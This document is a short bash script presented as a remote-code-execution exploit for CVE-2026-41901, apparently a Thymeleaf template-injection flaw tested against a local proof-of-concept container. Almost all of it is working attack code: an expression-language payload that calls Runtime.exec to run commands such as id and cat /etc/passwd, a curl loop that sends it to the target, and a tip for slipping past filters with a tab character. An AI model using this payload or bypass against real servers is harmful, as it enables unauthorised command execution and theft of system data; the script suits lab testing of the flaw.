#!/bin/bash
# CVE-2026-41901 RCE Exploit with Output

TARGET="http://localhost:8080/poc"

echo "[+] Starting CVE-2026-41901 Remote Execution Test"
echo ""

COMMANDS=("id" "whoami" "hostname" "ls /tmp" "cat /etc/passwd | head -5")

for cmd in "${COMMANDS[@]}"; do
    echo "[*] Executing: $cmd"
    
    # Payload that tries to return output
    PAYLOAD="[[${T(java.util.Scanner).new(T(java.lang.Runtime).getRuntime().exec(\"$cmd\").getInputStream()).useDelimiter(\"\\A\").next()}]]"
    
    RESPONSE=$(curl -s -G "$TARGET" --data-urlencode "input=$PAYLOAD")
    echo "$RESPONSE" | grep -E "(uid|root|www|linux|tmp)" || echo "   → Output may be blind or blocked"
    echo "--------------------------------------------------"
done

echo ""
echo "Tips:"
echo "• Try tab bypass: new[	]java.lang.ProcessBuilder..."
echo "• Check container logs: docker logs thymeleaf-rce"